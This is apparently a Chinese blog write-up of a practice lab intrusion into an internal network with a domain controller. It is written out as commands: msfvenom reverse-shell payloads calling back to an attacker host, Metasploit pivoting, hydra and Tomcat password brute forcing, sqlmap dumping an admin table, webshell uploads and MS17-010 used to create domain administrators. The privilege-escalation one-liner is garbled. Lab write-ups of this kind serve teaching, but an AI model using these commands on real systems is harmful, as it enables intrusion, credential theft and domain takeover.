记一次糟心的内网靶场实战
一開始的時候對整個內網的拓撲結構還不熟,所以做的時候有很多方法都沒有想到去用,大家多多指教。
一、環境準備
用網線連接交換機
配置Winodwss攻擊機IP為172.16.6.203
攻擊機Kali IP為172.16.6.202
主機IP為172.16.6.201
網關為172.16.6.1
子網掩碼255.255.255.0
目標IP 172.16.6.10
二、滲透具體流程
總覽拓撲圖
一開始以為192.168.6.200,一臺普通的雙網卡主機,沒有發現是防火墻,所以10.1.1.0網段的主機拓撲不夠清晰,后來老師講了才知道,防火墻做了端口映射。E主機的445端口映射到防火墻445端口,F主機的3389端口映射到防火墻的3389端口。
攻擊目標172.16.6.10
1、菜刀連接
訪問主頁。發現偽協議注入點。
http://172.16.6.10/index.php?page=php://input
使用菜刀連接,菜刀版本需2020年的版本。
2、生成并上傳木馬且回連meterpreter
查看phpinfo目標主機為Linux系統的主機。
Msf生成木馬msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.16.6.147 LPORT=2337 -f elf -a x86 —platform linux -o /home/hula.elf
并use exploit/multi/handle模塊監聽木馬回連情況。
將木馬通過菜刀上傳木馬,賦予運行權限,然后執行。
發現回連到meterpreter。
3、內網信息收集(同時添加路由并建立socks代理)
ipconfig查看網卡信息,發現有兩個網段的IP,分別為172.16.6.10和192.168.6.10。
自動添加路由run post/multi/manage/autoroute。
添加路由與代理:
use auxiliary/server/socks4a
show options
set srvhost 172.16.6.147
set srvport 1080
使用portscan模塊進行端口掃描
search portscan
set rhosts 192.168.6.0/24。
ipconfig查看網卡信息,發現有兩個網段的IP,分別為172.16.6.10和192.168.6.10
給msf添加192.168.6.10段的路由,run autoroute -s 192.168.6.0/24
添加代理:
use auxiliary/server/socks4a
show options
srvhost設為本機
srvport默認1080
可以看到掃描出15、16、17、200四臺主機,端口開放情況為
192.168.6.15 21/22
192.168.6.16 22/80/3306/8080
192.168.6.17 22/80/3306
192.168.6.200 80/135/445/3389
4、嘗試本機提權
用一句話提權
printf “install uprobes /bin/sh” > exploit.conf; MODPROBE_OPTIONS=”-C exploit.conf” staprun -u whatever exploit.conf” staprun -u whatever> exploit.conf; MODPROBE_OPTIONS=”-C
攻擊目標192.168.6.15
1、hydra爆破ftp賬號
因為目標機開放了21端口,用hydra爆破ftp弱密碼。
proxychains hydra -L /usr/wordlists/字典/Usernames/top_shortlist.txt -P /usr/wordlists/rockyou.txt -f -t 50 -vV ssh://192.168.6.15 -o ./ssh.log
爆破出賬號為admin,密碼為123456
2、登錄ftp服務
proxychains ftp 192.168.6.15,登陸后用dir命令發現報錯
使用xshell連接,發現可以連接。
攻擊目標192.168.6.16
1、發現tomcat
由于目標主機開發了8080端口,猜測有tomcat漏洞。
訪問網頁192.168.6.16:8080發現有tomcat頁面。
2、MSF爆破tomcat密碼
下面嘗試利用MSF爆破tomcat的賬號密碼,利用auxiliary/scanner/http/tomcat_mgr_login模塊,除了設置目標IP,用戶名字典,密碼字典外,再設置stop_on_success為true,意思是baopochen成功后停止。
默認管理后臺路徑為manager/html,也不用改,端口也不用改。成功爆破得到賬號密碼為tomcat/tomcat
3、繼續攻擊取得shell
使用msf中upload、deploy兩個模塊的tomcat漏洞發現無法綁定IP和端口。
使用msf生成war木馬文件。然后使用監聽模塊監聽木馬回連情況。
msfvenom -p java/meterpreter/reverse _tcp LHOST=192.168.6.10 LPORT=20003 -f war > lmx3.war
在下面的頁面上傳war木馬文件。
在網頁上查看自己的木馬,返回msf發現已返回meterpreter
攻擊目標192.168.6.17
1、SQL注入進后臺
訪問該站點。
kali下敏感目錄掃描工具Nikto使用:攻擊機:172.16.6.147(kali linux)、靶機:192.168.6.17 ( Metasploitable2-Linux)、使用Nikto 進行敏感目錄掃描、參數解析:-h/-host 指定域名或者IP、發現這個敏感目錄掃描不夠強大。
發現sql注入點http://192.168.6.17/message.php?id=
用手工簡單的測試了下:
http://192.168.6.17/message.php?id=1?頁面正常
http://192.168.6.17/message.php?id=1?order by 1頁面正常
http://192.168.6.17/message.php?id=1?order by 100頁面不正常
所以存在注入漏洞
sqlmap跑出數據庫的密碼
proxychains sqlmap -r /home/17tou.txt —batch –dbs
proxychains sqlmap -r /home/17tou.txt —batch —dbs -T admin –dump
最后爆出賬號是admin,密碼是xxxxxxx,使用md5解密
利用賬號密碼成功登錄192.168.6.17的后臺
2、MSF生成php木馬反彈meterpreter
瀏覽頁面,發現有一個文件上傳的注入點。上傳木馬,f12發現木馬上傳的位置與命名。
http://192.168.6.17/upload/images/20201022123044.php
在win10上安裝sockscap,管理員身份運行,代理設置kali的IP地址,端口1080。在sockscap上添加菜刀程序。使用菜刀連接木馬。
2、MSF生成php木馬反彈meterpreter
通過菜刀連接,發現目標主機為Linux系統。
用MSF生成的反彈木馬,然后起監聽。
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.6.10 LPORT=2339 -f elf -a x86 —platform linux -o /home/biu.elf
通過菜刀上傳到目標主機,賦予權限,然后運行。發現不能彈回meterpreter。
攻擊目標192.168.6.200
1、嘗試訪問web服務
因為發現目標開放了80,所以訪問下web站點
在kali自帶的火狐瀏覽器中設置socks代理,訪問192.168.6.200,發現頁面提示輸入賬號密碼。嘗試了弱口令的賬號密碼,發現無法人工爆破。
2、永恒之藍攻擊
由于目標開放了445端口,所以懷疑可能存在永恒之藍漏洞。
使用ms17-010的command模塊進行攻擊。
添加用戶,并添加至管理員組(或者直接修改administrator管理員密碼)
- ?
- ?
用命令set command ‘net group “Domain Admins”‘來查看是否成功添加到域管理員組。
3、遠程登錄
proxychains rdesktop 192.168.6.200
查看IP信息ipconfig /all,發現目標主機在域里面。網關為10.1.1.1,還有一個地址為10.1.1.200,以為目標主機位雙網卡,但沒有發現目標主機的地址192.168.6.200的存在,驚天大怪事啊。后來講解的時候才知道,這里是做了端口映射。
攻擊域成員機10.1.1.200
1、創建用戶并加入到域管理員組
由于目標開放了445端口,所以懷疑可能存在永恒之藍漏洞。
繼續用17010執行高權限命令的模塊進行攻擊:
添加用戶,并添加至管理員組(或者直接修改administrator管理員密碼)
- ?
- ?
用命令set command ‘net group “Domain Admins”‘來查看是否成功添加到域管理員組。
發現已經成功添加到域管理員組
2、用創建的域管理員登錄域環境
遠程登錄10.1.1.200
使用共享文件proxychains rdesktop 10.1.1.200 -r disk:aa=/home
遠程登錄administrator
上傳木馬并運行,發現meterpreter彈不回來,遂放棄
攻擊域控10.1.1.10
1、猜測端口轉發
以10.1.1.10為目標地址,使用msf的ms17-010模塊攻擊,發現操作并沒有在10.1.1.10上執行,而是在192.168.6.200上執行。猜測是進行了端口映射。
所以將192.168.6.200作為中間機器,使用lcx,但發現無法實現端口轉發。
使用xshell建立192.168.6.200與10.1.1.10之間的隧道,但發、法建立。遂放棄。
最后
通過ms17-010的command模塊可以添加用戶,但是command后面的指令要加單引號,因為是長命令。
遠程登錄10.1.1.10
總結
以上是生活随笔為你收集整理的记一次糟心的内网靶场实战的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 一次旁站信息泄露的dedecms站点渗透
- 下一篇: 第三十六讲:用好共享内存工具:Slab管